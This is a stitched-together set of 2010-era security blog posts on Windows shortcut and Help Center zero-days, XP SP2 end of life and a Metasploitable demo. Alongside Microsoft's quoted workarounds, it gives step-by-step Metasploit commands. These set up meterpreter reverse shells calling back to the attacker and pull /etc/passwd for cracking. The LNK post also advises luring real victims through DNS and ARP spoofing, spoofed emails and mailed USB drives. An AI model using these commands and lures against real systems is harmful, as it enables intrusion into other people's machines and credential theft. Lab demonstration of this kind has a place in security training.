A few days ago I posted a blog entry called Microsoft Validates Shortcut Vulnerability, this entry basically explains what the issue is and also listed a few basic mitigation techniques.

Below I will be demonstrating how you can actively exploit this vulnerability using Metasploit.

Proof of concept testing:
This test was preformed using my BT4 VM which was assigned IP address 192.168.126.135 and a Win XPSP3 VM using IP address 192.168.126.134.

Step 1: Load Metasploit and get latest update

On my BackTrack4 VM, I browsed to /pentest/exploit/framework3, then load msfconsole once that is loaded run svn update so you can get the latest and greatest.

Fig-1 SVN Update

Step 2: Select your Exploit and Payload

msf > use exploit/windows/browser/ms10_xxx_Windows_shell_lnk_execute

msf exploit(ms10_xxx_Windows_shell_lnk_execute) > set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(ms10_xxx_Windows_shell_lnk_execute) > show options

The show options commands will show you the various parameters  that needs to be set in order for the exploit to be functional. In our case its setting up the listening IP and listening port.

Fig-2  Choosing Exploit and Payload

Step 3: Fill-in required options and run exploit

At this stage you simply fill in the correct IP address and listening port for the machine that you are launching the attack from. If this is not correct the victim machine would not know where to connect back too, since I selected reverse_tcp.

msf exploit(ms10_xxx_Windows_shell_lnk_execute) > SET SRVHOST 192.168.126.135

msf exploit(ms10_xxx_Windows_shell_lnk_execute) >SET LHOST 192.168.126.135

msf exploit(ms10_xxx_Windows_shell_lnk_execute) >exploit

Fig-3 Fill-in LHOST and SRVHOST

Step 4: Get your victim to click the link or view the malicious file

Now at this stage  you have to get a bit creative, I can suggest a few things you can try:

• Use Ettercap to DNS spoof a target network and redirect them to your malicious URL, example.
• Use a tool like Social Engineering Toolkit “SET” to send a spoofed email with your malicious link, example.
• ARP spoof your host network and find a given target that’s using Facebook or one of  many social networks and try to send them the link that way.
• Try a far out social engineering  attack like purchase several USB drives inject them and mail them to your target with the label “free USB drive”.

Once you have your targets in sight just sit back and wait, once an exploitation has been kicked off you will see the below;

Fig-4 Successful Exploit

Verify you have an active session, session using sessions -l, next connect to that session with sessions -i #, from here you can run help to get a list of possible commands. I simply ran ipconfig and getuid to show that I was on the Windows XPVM and that it was successfully exploited.

Fig-5 Running Commands on exploited host

Fig-6 Popup box on exploited host

In the end there is really not much the average user can do that is not aware of your everyday vulnerability, but us as IT professional need to be in the loop so that we can take back the information and make them aware. Lastly the image in figure 6 should be a dead giveaway that something is up with your computer if you didn’t connect to a share but all of sudden you see one pop-up its time for a “wipe and reinstall.” Have fun until Microsoft patches this one and remember to be responsible. All feedback are welcome.

Last Thursday I read a posting over at   http://krebsonsecurity.com referencing  a potential vulnerability that relates to the way how Windows parses shortcuts. Since Microsoft didn’t confirm this at the time it was just another  interesting read. Now one day later Microsoft did validate this claim and now its yet another Windows zero-day without a proper workaround.

Issue:

The vulnerability exists because Windows incorrectly parses shortcuts in such a way that malicious code may be executed when the user clicks the displayed icon of a specially crafted shortcut. This vulnerability is most likely to be exploited through removable drives. For systems that have AutoPlay disabled, customers would need to manually browse to the root folder of the removable disk in order for the vulnerability to be exploited.

Workaround:

Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:

•

Disable the displaying of icons for shortcuts Note Using Registry Editor incorrectly can cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that problems resulting from the incorrect use of Registry Editor can be solved. Use Registry Editor at your own risk. For information about how to edit the registry, view the “Changing Keys And Values” Help topic in Registry Editor (Regedit.exe) or view the “Add and Delete Information in the Registry” and “Edit Registry Data” Help topics in Regedt32.exe. 1. Click Start, click Run, type Regedit in the Open box, and then click OK 2. Locate and then click the following registry key: HKEY_CLASSES_ROOT\lnkfile\shellex\IconHandler 3. Click the File menu and select Export 4. In the Export Registry File dialog box, enter LNK_Icon_Backup.reg and click Save Note This will create a backup of this registry key in the My Documents folder by default 5. Select the value (Default) on the right hand window in the Registy Editor. Press Enter to edit the value of the key. Remove the value, so that the value is blank, and press Enter. 6. Restart explorer.exe or restart the computer. Impact of workaround.Disabling icons from being displayed for shortcuts prevents the issue from being exploited on affected systems. When this workaround is implemented, shortcut files and Internet Explorer shortcuts will no longer have an icon displayed.

•

Disable the WebClient service Disabling the WebClient service helps protect affected systems from attempts to exploit this vulnerability by blocking the most likely remote attack vector through the Web Distributed Authoring and Versioning (WebDAV) client service. After applying this workaround, it will still be possible for remote attackers who successfully exploited this vulnerability to cause Microsoft Office Outlook to run programs located on the targeted user’s computer or the Local Area Network (LAN), but users will be prompted for confirmation before opening arbitrary programs from the Internet. To disable the WebClient Service, follow these steps: 1. Click Start, click Run, type Services.msc and then click OK. 2. Right-click WebClient service and select Properties. 3. Change the Startup type to Disabled. If the service is running, click Stop. 4. Click OK and exit the management application. Impact of workaround. When the WebClient service is disabled, Web Distributed Authoring and Versioning (WebDAV) requests are not transmitted. In addition, any services that explicitly depend on the Web Client service will not start, and an error message will be logged in the System log. For example, WebDAV shares will be inaccessible from the client computer. How to undo the workaround. To re-enable the WebClient Service, follow these steps: 1. Click Start, click Run, type Services.msc and then click OK. 2. Right-click WebClient service and select Properties. 3. Change the Startup type to Automatic. If the service is not running, click Start. 4. Click OK, and exit the management application.

This brings up the same concern I spoke about in this post , now that Microsoft is no longer supporting SP2 we can add this to the list of exploits that we can always be certain will work on the SP2 platform. In the end, if the workaround is not hindering any mission critical application  I think everyone should apply it.

References:

http://krebsonsecurity.com/2010/07/experts-warn-of-new-windows-shortcut-flaw/

http://www.computerworld.com/s/article/9179299/Microsoft_confirms_nasty_Windows_zero_day_bug?taxonomyId=17

http://www.microsoft.com/technet/security/advisory/2286198.mspx

http://clubhouse.microsoft.com/Public/Post/48631f1c-c884-4d3e-a19b-c9994bcd4637

Click OK and exit the management application.

In the words of Microsoft patch Tuesday is defined as ” When necessary, Microsoft releases security updates on the second Tuesday of each month. We publish security bulletins to announce and describe the update. Occasionally security updates are released more often.”

Now just in case you are wondering why I am choosing today to talk about patch Tuesdays of all days, well for starters today is significant because  patches,  and support for XP SP2 officially ends today. This might not seem like a big deal for a lot of people but I know the are several  companies that still run legacy software that are not supported by SP3 or above. So in short any new vulnerabilities that are discovered in the coming months or years will have all those users at there disposal just waiting to be exploited!

If you think that’s bad what about if a vulnerability was already  reported to Microsoft years ago and it was never patched, then those users could have already been exploited. A reference for this was a statement made by HD Moore on twitter today, “Almost four years later, Microsoft EOL’s Windows XP SP2 without fixing the flaw I reported in 2006. “ HDM is the Chief Architect of Metasploit project, the project was created to provide information on exploit techniques and to create a functional knowledge base for exploit developers and security professionals. So luckily he is one of the good guys, but what if this exploit and many more like this was in the wrong hands, sky’s the limit.

So for anyone that is still using XP SP2 time to apply the following patches below, and also come up with a strategy for these potentially vulnerable machines.

Latest Security Updates

• MS10-042 – (Patch NOW) addresses a vulnerability in Microsoft Windows (KB 2229593) –> previous blog entry on this
• MS10-043 – addresses a vulnerability in Microsoft Windows (KB 2032276)
• MS10-044 – addresses vulnerabilities in Microsoft Office (KB 982335)
• MS10-045 – addresses a vulnerability in Microsoft Office Outlook (KB 978212)

Looking forward to seeing what  others might have to say about this.

References:

http://www.microsoft.com/security/updates/bulletins/default.aspx

http://isc.sans.edu/diary.html?storyid=9166&rss

http://www.microsoft.com/security/updates/bulletins/201007.aspx

After seeing all the buzz on twitter about the newly discovered Microsoft zero day, I decided to try and replicate it in my lab and just act as another source for bringing about some awareness on the issue at hand.

According to  Microsoft Security Advisory (2219475),  Microsoft is investigating new public reports of a possible vulnerability in the Windows Help and Support Center function that is delivered with supported editions of Windows XP and Windows Server 2003. This vulnerability could allow remote code execution if a user views a specially crafted Web page using a Web browser or clicks a specially crafted link in an e-mail message. Microsoft is aware that proof of concept exploit code has been published for the vulnerability. However, Microsoft is not currently aware of active attacks that use this exploit code or of customer impact at this time. Microsoft is actively monitoring this situation to keep customers informed and to provide customer guidance as necessary.

In short  you are  affected if you are running any of the following OS:

• Windows XP Service Pack 2 and Windows XP Service Pack 3
• Windows XP Professional x64 Edition Service Pack 2
• Windows Server 2003 Service Pack 2
• Windows Server 2003 x64 Edition Service Pack 2
• Windows Server 2003 with SP2 for Itanium-based Systems

The advisory was prompted by the bug’s disclosure early Thursday , and the release of proof-of-concept attack code. Tavis Ormandy, a security engineer who works for Google in Switzerland, defended the decision to reveal the flaw only five days after reporting it to Microsoft. But Microsoft and other researchers questioned the quick publication.

Now I am somewhat on the fences with this one, I can see how responsible disclosure would have been ideal in this case for Microsoft. This would have given MS some more time to get a fully tested patch out. On the flip side I think knowing in advance can give us as defender a fighting chance since the disclosure to patch cycle can be a pretty lengthy process, and the “bad guys” could have already been using this for a long time now.

While trying to test this I was running into some issues then I was pointed to the following pastebin entry from the helpful guys over at http://www.skullsecurity.org/blog/ IRC.

POC testing with Metasploit Test #1:

I  started by testing the current exploit from the Metasploit framework on my BT4 VM, while attacking my Windows 7 workstation which had MSE installed. Since the release notes stated that Windows 7 is not affected I just wanted to see what type of effect it would have. I loaded up my Backtrack VM, lauched MSF and use the following commands.

msf > use exploit/windows/browser/ms10_xxx_helpctr_xss_cmd_exec

msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > SET SRVHOST 192.168.126.131

msf exploit(ms10_xxx_helpctr_xss_cmd_exec) >SET LHOST 192.168.126.131

msf exploit(ms10_xxx_helpctr_xss_cmd_exec) >exploit

And as expected it failed!

Fig-1 Failed against Win7

Interestingly enough Microsoft Security Essentials was able to detect this while my Comodo Internet security suite did not.Fig-2 MSE detected Exploit attempt

I was then able to browse my temporary internet folder and detected the html page with the malicious Iframe.

Fig-3 Malicious Iframe

POC testing with Metasploit Test #2:

I then went on to try this on a newly build Windows XP SP3 and it kept failing, now after running the 74 or so Windows updates I attempted to try it again and I was sucessful. So it is always important to run updates .

I started this second test by loading up my BackTrack VM and repeating the same steps as above, then once this is setup I then went over to my Windows XP test machine and connected to http://backtrackmachine, so and just sit back and watch Metasploit with the Meterpreter payload do its thing.

msf > use exploit/windows/browser/ms10_xxx_helpctr_xss_cmd_exec

msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > SET SRVHOST 192.168.126.131

msf exploit(ms10_xxx_helpctr_xss_cmd_exec) >SET LHOST 192.168.126.131

msf exploit(ms10_xxx_helpctr_xss_cmd_exec) >exploit

Fig-4 XP Successfully Exploited

Fig-5 Game over

As you can see form Fig-5  above the payload was deployed successfully and I was able to run a simple ipconfig command to verify that I was on the victim system with IP address 192.168.126.134.  I also went back over to the XP machine and ran netstat -an to verify that I was connected to the BackTrack VM via the listening port 4444.

Fig-6 WinXP Netstat -an

Now I noticed a few things on the victim test XP machine, once I connected to the malicous URL, (which with all the socail media outlets its just too easy to get an average user to click on a link ):

• I saw a command prompt pop-up and disappeared after 1-2 seconds
• I notice my Windows media player launched itself
• Lastly the “Help and Support Center” page was launched

Now for the average user some of these things might not always send up a red flag. However for anyone remotely security conscious if you ever notice a few of these random acts of weirdness its time to get out that clean backup image and start the nuke and pave process.

References

http://www.computerworld.com/s/article/9177966/Microsoft_confirms_critical_Windows_XP_bug

http://www.microsoft.com/technet/security/advisory/2219475.mspx

http://seclists.org/fulldisclosure/2010/Jun/205

http://www.offensive-security.com/metasploit-unleashed/metasploit-unleashed-free-information-security-training

Back in late May I was preparing for a presentation and while trying to figure out if I should do a live demo or show screen-shots, I noticed a tweet from HDMoore announcing the release of “Metasploitable”.

According to the Metasploit blog, Metasploitable is an Ubuntu 8.04 server install on a VMWare 6.5 image. A number of vulnerable packages are included, including an install of tomcat 5.5 (with weak credentials), distcc, tikiwiki, twiki, and an older mysql. Now you might ask yourself why is this important, who wants a system that is easily hackable? The answer is simple, if you are doing exploit development/pentesting or just want to practice your KungFU and need a platform to test on then Metasploitable is the answer.

In my case I needed to do a demo and instead of configuring a vulnerable system I simply downloaded the torrent, loaded it up into my VMware player and I was set to go. At first I was having a hard time finding people to seed the torrent, however after I visited the Pauldotcom IRC room and spoked with Mubix, a few minutes later I had about 20 people seeding.

You should read the entire blog posting to really get a feel for some of the things you can do with Metasploitable. Keeping with the theme from my last blog post “So easy, even A Script Kiddie can do it” I will attempt to attack this VM using simple but effective methods.

Step One “Nmap Scan”:

The first scan I ran was Nmap -A: Which Enables OS detection and Version detection, Script scanning and Traceroute. Once I got an idea what I was dealing with I then proceeded to run Nmap 192.168.126.128 –script=smb-brute.nse. The purpose of this script try to brute force the host and reports but any successful credentials. In this case those credentials were msfadmin/msfadmin and user/user.

Fig-1 Nmap –script=smb-brute.nse

Step two “Fast-Track Metasploit Autopwnage”:

Quoted from the Fast-Track  program page, Metasploit Autopwn is a feature within Metasploit that is rich with different options. Autopwn allows you to NMAP scan a host, and automatically run exploits against the open ports on the system. So to break it down in simplistic terms, a port scan is ran against multiple host or one target, once those ports have been identified, metasploit will pull what exploits it have for those open ports, it may be 0 it may be 30. Those exploits are then launched against the system you scanned. It’s really a brute force exploits, it doesn’t know what version is being run on the system it just blindly launches a ton of exploits at the system.

After running the exploit brute force against the metasploitable VM  I was able to successfully exploit the system and got a session, however I was not able to interact with this session. That being said I was 50% there, I now have a working exploit I can manually use with Metasploit and chose a payload of my liking to gain shell access.

Fig-2 Fast-Track menu, “choose option 2″

Fig-3 Fast-Track “successfully found an exploit”

Step three “Using Metasploit”:

At this stage we already have a working exploit that Fast-Track discovered above so its time to use that exploit and a payload of our choosing. I am using Back Track 4 final release since the idea is to use the simplest tools possible instead of installing and configuring anything, also my metsploitable IP address in this example is 192.168.126.128.

cd /pentest/exploit/framework3

msfconsole

msf > svn update

msf > use exploit/unix/webapp/tikiwiki_graph_formula_exec

msf exploit (tikiwiki_graph_formula_exec) > set RHOST 192.168.126.128

msf exploit (tikiwiki_graph_formula_exec) > set RPORT 80

msf exploit (tikiwiki_graph_formula_exec) > set PAYLOAD  cmd/unix/generic

msf exploit (tikiwiki_graph_formula_exec) > set CMD ‘cat /etc/passwd’

msf exploit (tikiwiki_graph_formula_exec) > exploit

The end results will be a screen display of the password file which you can run through your favorite password cracker and have fun with the results.

Fig-4 Cat “etc/passwd”

Lastly you can also connect to the host via http://hostname/tikiwiki/tiki-index.php and login with admin/admin which in most cases are usually among my list of default passwords to try. So in short these are just a few simple techniques you can try during your demo to bring some real world examples instead of just giving a  slides show to your audience.

References:

http://blog.metasploit.com/2010/05/introducing-metasploitable.html

http://www.offensive-security.com/metasploit-unleashed/Fast-Track-Modes

http://blog.metasploit.com/2010/05/introducing-metasploitable.html